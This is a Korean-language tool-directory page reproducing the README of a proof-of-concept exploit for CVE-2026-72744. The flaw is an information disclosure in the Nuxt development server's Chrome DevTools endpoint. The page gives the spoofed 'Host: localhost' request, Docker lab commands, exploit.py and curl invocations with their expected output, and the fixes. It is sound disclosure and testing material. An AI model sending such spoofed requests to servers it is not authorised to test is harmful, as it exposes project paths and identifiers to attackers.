Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-72744-poc — CVE-2026-72744에 대한 개념 증명 익스플로잇으로, Nuxt 개발 서버의 Chrome DevTools 워크스페이스 엔드포인트에 존재하는 정보 공개 취약점입니다. 해당 결함을 시연하고 수정 사항을 검증합니다. | Kitploit
도구/GitHubGitHub/saku0512/cve-2026-72744-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

CVE-2026-72744에 대한 개념 증명 익스플로잇으로, Nuxt 개발 서버의 Chrome DevTools 워크스페이스 엔드포인트에 존재하는 정보 공개 취약점입니다. 해당 결함을 시연하고 수정 사항을 검증합니다.

저장소 보기
5시간 17분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-72744: Nuxt Chrome DevTools 엔드포인트 정보 노출 PoC

English version

개요

이 리포지토리는 Nuxt 개발 서버의 Chrome DevTools workspace 엔드포인트에 존재하는 정보 노출 취약점 CVE-2026-72744의 Proof of Concept (PoC)입니다.

취약한 개발 서버는 연결 원본이 로컬인지 여부를 TCP peer address가 아닌, 공격자가 지정할 수 있는 Host 등의 HTTP 헤더로 판단합니다. 개발 서버가 0.0.0.0에 바인딩된 경우, LAN 상의 비인증 공격자는 Host: localhost를 붙인 요청으로 프로젝트의 절대 경로와 영구적인 workspace UUID를 획득할 수 있습니다.

이 PoC는 Nuxt 4.5.0(취약 버전)과 4.5.1(수정 버전)을 Docker로 기동하고, 호스트 측에서 동일한 요청을 보내 동작의 차이를 확인합니다. 파일의 읽기/쓰기나 코드 실행은 수행하지 않습니다.

면책 조항

교육 목적 및 허가된 보안 검증에만 사용하십시오. 제3자의 환경에 무단으로 요청을 전송하지 마십시오.

취약점 상세

  • CVE ID: CVE-2026-72744
  • 제품: Nuxt
  • 유형: 정보 노출 (CWE-200)
  • 영향을 받는 버전: >= 4.4.7, < 4.5.1 및
>= 3.21.7, < 3.21.10
  • 수정된 버전: 4.5.1 / 3.21.10
  • 대상: 개발 서버만 해당(production build는 대상 외)
  • 필수 조건: 네트워크 도달 가능한 바인드와, 기본적으로 활성화된 experimental.chromeDevtoolsProjectSettings
  • 영향: rootDir의 절대 경로와 프로젝트 고유 workspace UUID 노출
  • 근본 원인

    취약 버전의 isLocalDevRequest는 Host가 허용 목록에 있고, 브라우저 유래의 크로스사이트 헤더가 없으면 요청을 로컬로 취급합니다. 비브라우저 클라이언트는 이러한 헤더를 자유롭게 생략·지정할 수 있으므로, 다음 요청이 검사를 통과합니다.

    root@kitploit:~
    GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
    Host: localhost
    

    수정 버전은 기존 헤더 검사에 더해, 실제 TCP peer address가 loopback (127.0.0.0/8 또는 ::1)임을 요구합니다.

    Proof of Concept(사용 방법)

    1. 환경 기동

    root@kitploit:~
    docker compose up -d --build
    
    URL버전예상 결과
    http://localhost:3000Nuxt 4.5.0HTTP 200, 정보 노출
    http://localhost:3001Nuxt 4.5.1HTTP 403

    최초 빌드에서는 npm 패키지를 획득하므로 수 분이 걸릴 수 있습니다.

    2. 취약 버전 검증

    root@kitploit:~
    python3 exploit.py -t http://localhost:3000 --expect vulnerable
    

    예상 출력:

    root@kitploit:~
    [!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.
    

    3. 수정 버전 검증

    root@kitploit:~
    python3 exploit.py -t http://localhost:3001 --expect fixed
    

    예상 출력:

    root@kitploit:~
    [+] FIXED: the non-loopback request was rejected with HTTP 403.
    

    4. curl로 확인

    root@kitploit:~
    curl -i -H 'Host: localhost' \
      http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json
    
    curl -i -H 'Host: localhost' \
      http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json
    

    Docker의 포트 전달을 경유하므로, 컨테이너에서 본 연결 원본은 loopback이 아닙니다. 이를 통해 단일 호스트 상에서 LAN 공격 상당의 조건을 재현할 수 있습니다.

    5. 정리

    root@kitploit:~
    docker compose down -v
    

    PoC 판정 조건

    exploit.py는 Host: localhost를 지정하고, Origin, Referer, Sec-Fetch-Site를 보내지 않고 대상 엔드포인트에 접근합니다. HTTP 200의 JSON에 문자열의 workspace.root와 workspace.uuid가 포함되는 경우에만 취약하다고 판정합니다. HTTP 403은 수정된 기대 동작입니다.

    대책

    Nuxt 4계열은 4.5.1 이후, 3계열은 3.21.10 이후로 업데이트하십시오. 업데이트할 수 없는 경우 개발 서버를 loopback에만 바인드하거나, experimental.chromeDevtoolsProjectSettings: false를 설정하십시오.

    참고 정보

    • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
    • Nuxt 4.5.1 release
    • Fix commit
    • NVD: CVE-2026-72744
    도구 다운로드